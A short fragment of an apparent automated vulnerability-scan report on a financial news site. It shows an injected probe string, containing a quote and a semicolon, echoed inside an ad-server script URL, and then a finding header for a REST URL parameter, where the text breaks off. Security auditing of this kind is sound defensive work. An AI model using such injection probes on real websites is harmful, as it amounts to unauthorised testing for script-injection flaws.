<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance13e57';ca94ef828cc/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance13e57';ca94ef828cc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=93912031?">
...[SNIP]...

1.258. http://www.financialpost.com/personal-finance/Warning+Asset+bubbles+underway/3976343/story.html [REST URL parameter 3]

Summ